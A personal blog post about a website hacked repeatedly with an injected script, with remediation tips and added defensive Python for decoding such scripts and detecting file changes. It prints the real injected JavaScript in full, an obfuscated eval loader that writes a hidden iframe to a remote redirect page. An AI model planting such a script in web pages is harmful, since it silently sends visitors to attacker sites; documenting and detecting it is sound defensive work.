Hidden iFrames = Hidden Demons!

Setting the Scene

Following an extended period of disuse, I recently returned to one of my domains to completely overhaul and update it. Everything was as I'd left it except for a line of text at the top of the page that read:

you must pay for this crypt

A quick search proved that I'd been hacked and that this was malware. I don't know how long it had been there or how much damage this simple line of text had or could cause, but I certainly knew that I needed it gone. Now.

I connected immediately through my FTP program and deleted all my files. Naively assuming that the issue had been solved, I created a new two-page website and uploaded my files.

Checking it on various computers and browsers, the website looked great. I went back later that day to do some tweaking and was a bit surprised to see that only my background image remained. Everything else was missing. The table, my title image, my Adsense ad, my text, everything gone.

Again, naively assuming that I'd made a mistake, I uploaded my files again and completed the tweaks that I'd intended.

The following morning, I checked in again and my website again had only the background image. I knew then that this was not my mistake. Someone or something had access to my website.

First Attempt at a Fix

I started by uploading the website, again and again. It seemed that my website was disappearing (well, all except the background image) after 6 to 8 hours. There was no redirect or strange ads or text to replace my content on the site. And the code looked strange, with a blob of Javascript seeming to be the offending item, not originating from me.

Googling about the script or the symptoms brought few helpful results.

My next step was to change my passwords, starting with my FTP password and then my login password for my webspace provider account.

When that did not solve the issue, I called my webspace provider for assistance, five times in total, and also emailed their technical support people and finally their security team. They were unhelpful, reporting only that no other IP address had uploaded to my webspace and that the issue was likely to be code-related and, as such, out of their remit.

Getting Worse

Then I started seeing a flash of my background image followed quickly by a redirect to a website I'd never heard of.

My webspace provider had sent me a form letter email where they mentioned Code Injection and Remote File Inclusion but neither seemed exactly what I was going through and they were not interested in any further help.

The Offending Code (scroll right)

<html>
<head>
<title>Crazy!</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body bgcolor="#CCCC66" text="#006600" background="images/bg.jpg" link="#009933"> <script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c58c60c61c63c74c60c60c64c72c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c7 5c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c58c60c61c63c74c60c60c64c72c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} 
r=String;z=((e)?h:"");for(;569!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h)e(s);</script>
<div align="center">
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><font size="7">This is crazy! <br>
Leave my site alone!</font></p>
</div>
</body>
</html>

A Shining Light on a Dark Day

I sent a message to a friend who I knew was web-savvy and who had worked in the web design field. He showed suitable sympathy and gave me a few suggestions of where to look for the answer.

He wrote:

I suspect what that Javascript is doing is, when it runs in the browser, it is corrupting the page by adding a "hidden iframe" into which is loaded a page that redirects you. Googling the term "hidden iframe" will give you more info.

Doing as I was told, I Googled "hidden iframes" and landed here. This fantastic fellow then led me to the root of my problem and ultimately got me my website back. I must remember to send My Hero a big, fat cyber kiss!
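The friend's note describes the mechanism: the obfuscated script on the page rebuilds its real code from an array of numbers (split on the letter "c", add 42 to each entry, hand the result to eval) and that code writes an invisible iframe into the page. As an added example, not code from the post or its author, here is a small Python scanner that does the reverse for a defender: it pulls the numeric array out of a script block, decodes it with the same +42 rule, and reports any iframe that is hidden by CSS, tiny, or positioned off-screen. The "+42" and "c" constants come from the script shown above; the sample page, its decoded payload and the hidden.invalid frame URL are constructed fixtures and are not the real injected content.

```python
import re
from html.parser import HTMLParser

# The script shown on the page rebuilds its real code from an array of numbers:
# split on the letter "c", add 42 to each entry, and feed the result to eval.
# These two constants come from that script; the rest of this file is an
# added example, not the page's code.
OFFSET = 42
SEP = "c"


def decode_injector_string(encoded: str, offset: int = OFFSET, sep: str = SEP) -> str:
    """Undo the number-array obfuscation: each token is ord(char) - offset."""
    encoded = re.sub(r"\s+", "", encoded)  # copy/paste or page extraction can add spaces
    return "".join(chr(int(tok) + offset) for tok in encoded.split(sep) if tok)


def encode_injector_string(text: str, offset: int = OFFSET, sep: str = SEP) -> str:
    """Inverse of the decoder; only used here to build a harmless fixture."""
    return sep.join(str(ord(ch) - offset) for ch in text)


# A quoted run of at least 20 signed integers joined by SEP.
ENCODED_ARRAY_RE = re.compile(rf"['\"]((?:-?\d+{SEP}){{20,}}-?\d+)['\"]")

# Heuristics drawn from the injected script's own tricks.
SCRIPT_INDICATORS = {
    "eval assembled from string pieces": re.compile(r"\"e\"\s*\+\s*\"va\"|window\[\w+\s*\+\s*\"l\"\]"),
    "fromCharCode decoding": re.compile(r"fromC(?:harCode)?"),
    "long numeric array": ENCODED_ARRAY_RE,
    "iframe tag inside script text": re.compile(r"<iframe", re.IGNORECASE),
}


def _px(value):
    m = re.match(r"\s*(\d+)", str(value or ""))
    return int(m.group(1)) if m else None


def iframe_hiding_reasons(attrs: dict) -> list:
    """Why an <iframe> with these attributes would be invisible to a visitor."""
    reasons = []
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "visibility:hidden" in style or "display:none" in style:
        reasons.append("hidden via CSS")
    w, h = _px(attrs.get("width")), _px(attrs.get("height"))
    if w is not None and h is not None and w <= 20 and h <= 20:
        reasons.append(f"tiny frame {w}x{h}")
    if "position:absolute" in style and ("left:-" in style or "top:-" in style):
        reasons.append("positioned off-screen")
    return reasons


class InjectionScanner(HTMLParser):
    """Collects <script> bodies and any <iframe> that is hidden from view."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []
        self.hidden_iframes = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self.in_script = True
            self.scripts.append("")
        elif tag == "iframe":
            reasons = iframe_hiding_reasons(attrs)
            if reasons:
                self.hidden_iframes.append({"src": attrs.get("src", ""), "reasons": reasons})

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script and self.scripts:
            self.scripts[-1] += data


def scan_html(html: str) -> dict:
    """Report hidden iframes and obfuscated scripts found in one HTML document."""
    parser = InjectionScanner()
    parser.feed(html)
    parser.close()
    report = {"hidden_iframes": list(parser.hidden_iframes), "suspicious_scripts": []}
    for body in parser.scripts:
        hits = [name for name, rx in SCRIPT_INDICATORS.items() if rx.search(body)]
        decoded = [decode_injector_string(m) for m in ENCODED_ARRAY_RE.findall(body)]
        for payload in decoded:  # an iframe that only appears after decoding still counts
            inner = InjectionScanner()
            inner.feed(payload)
            inner.close()
            if inner.hidden_iframes:
                hits.append("decoded payload writes a hidden iframe")
                report["hidden_iframes"].extend(inner.hidden_iframes)
        if hits:
            report["suspicious_scripts"].append({"indicators": hits, "decoded": decoded})
    return report


# Constructed fixture: the frame URL is a reserved .invalid name, and the payload
# is obfuscated the same way the page's script does it, but from this harmless text.
PAYLOAD = ("document.write(\"<iframe src='http://hidden.invalid/' width='10' height='10' "
           "style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>\");")
SAMPLE_HTML = f"""<html><body background="images/bg.jpg">
<script>f=['{encode_injector_string(PAYLOAD)}'][0].split('c');s='';
for(i=0;i<f.length;i++)s+=String["fromC"+"harCode"](f[i]*1+42);window["e"+"va"+"l"](s);</script>
<p>This is crazy! Leave my site alone!</p></body></html>"""

if __name__ == "__main__":
    import json
    print(json.dumps(scan_html(SAMPLE_HTML), indent=2))
```

Run it over a downloaded copy of a page rather than in a browser: the scanner never executes the script, it only decodes the array, so a page that is flagged can be inspected safely. The decoder strips whitespace first because copying an injected script out of an editor or web page often breaks the number array with stray spaces, exactly as happens in the listing above.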

The Solution

My Hero's steps for removing hidden iframes

  1. Do a full system scan. I did this and it took 6 hours, but it was well worth it. I found 4 malicious files, including 3 with 'Javascript' or 'JS' in the title and one with 'iframe' in the title.
  2. Change your FTP password.
  3. Keep the password secure by not clicking on 'save password'. Taking the time to type it in every time you want to access the webspace means that it will be difficult for hackers to steal it.
  4. If you can, do not use the FTP protocol. Instead, try to use the more secure SFTP or FTPS.

Finding these four malicious files and not saving my password has allowed me to regain control of my website.

It's a fabulous feeling!


UPDATE: A few weeks later...

I've had another attack on my website since I wrote this hub. The symptoms were identical to last time, causing me immense frustration.

Only my index.htm page was ever affected and it got me to thinking that the attacker's code was likely written to affect pages with that name, or close variations like index.html. So I deleted my index page and saved it again using the name default.htm, which a browser also recognizes as the front page of a website.

Two weeks later, my website is still up and running. Could it be that bozo cyber attackers have written code for a relentless onslaught and have omitted to include default.htm? I'll go with that assumption for now!
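Whether the attacker's code looks for index.htm or not, the symptom in both attacks was the same: the front page silently changed hours after a clean upload. The check a practitioner would want is a file-integrity baseline of the uploaded site, re-run on a schedule, that reports any file that was added, removed or modified and calls out the front page by name. The following Python script is an added example, not code from the post; the two-page site it builds in a temporary directory and the "injection" it simulates are constructed, and the baseline file path is an assumption.

```python
import hashlib
import json
import tempfile
from pathlib import Path

# Front-page names mentioned in the post; a change to any of these is flagged separately.
ENTRY_PAGES = {"index.htm", "index.html", "default.htm"}


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large images do not sit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root) -> dict:
    """Map every file under root (relative, POSIX-style path) to its hash."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hash_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare(baseline: dict, current: dict) -> dict:
    """Classify differences between two baselines."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k]),
    }


def check_site(root, baseline_path) -> dict:
    """Create the baseline on first run; on later runs report what changed.

    baseline_path is an assumed location outside the web root, so the
    baseline itself is never uploaded or hashed.
    """
    baseline_path = Path(baseline_path)
    current = build_baseline(root)
    if not baseline_path.exists():
        baseline_path.write_text(json.dumps(current, indent=2, sort_keys=True))
        return {"status": "baseline-created", "files": len(current)}
    diff = compare(json.loads(baseline_path.read_text()), current)
    diff["entry_page_touched"] = sorted(
        p for p in diff["added"] + diff["modified"] if Path(p).name.lower() in ENTRY_PAGES)
    changed = diff["added"] or diff["removed"] or diff["modified"]
    diff["status"] = "changed" if changed else "clean"
    return diff


def demo() -> dict:
    """Constructed run: baseline a two-page site, then simulate the symptom from the post."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp) / "htdocs"
        (site / "images").mkdir(parents=True)
        (site / "index.htm").write_text("<html><body background='images/bg.jpg'>Hello</body></html>")
        (site / "about.htm").write_text("<html><body>About</body></html>")
        (site / "images" / "bg.jpg").write_bytes(b"\xff\xd8\xff\xe0 constructed, not a real jpeg")
        baseline = Path(tmp) / "baseline.json"   # kept outside the web root
        first = check_site(site, baseline)        # records the known-good state
        # Simulate the injection: a script block appears in the front page only.
        with open(site / "index.htm", "a") as fh:
            fh.write("<script>/* constructed injected block */</script>")
        second = check_site(site, baseline)
        return {"first": first, "second": second}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run check_site against a local mirror pulled down over SFTP (or against the local copy you upload from, before each upload) from a cron job; a "changed" result with index.htm or default.htm in entry_page_touched reproduces the post's symptom within minutes instead of the next morning, and tells you exactly which files to restore from the clean copy.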

Comments (1)

Giselle Maine 4 years ago

Fascinating... I think this will be very helpful for website owners. I'm glad you were able to solve and fix the problem in the end. I liked the step-by-step description of what happened.
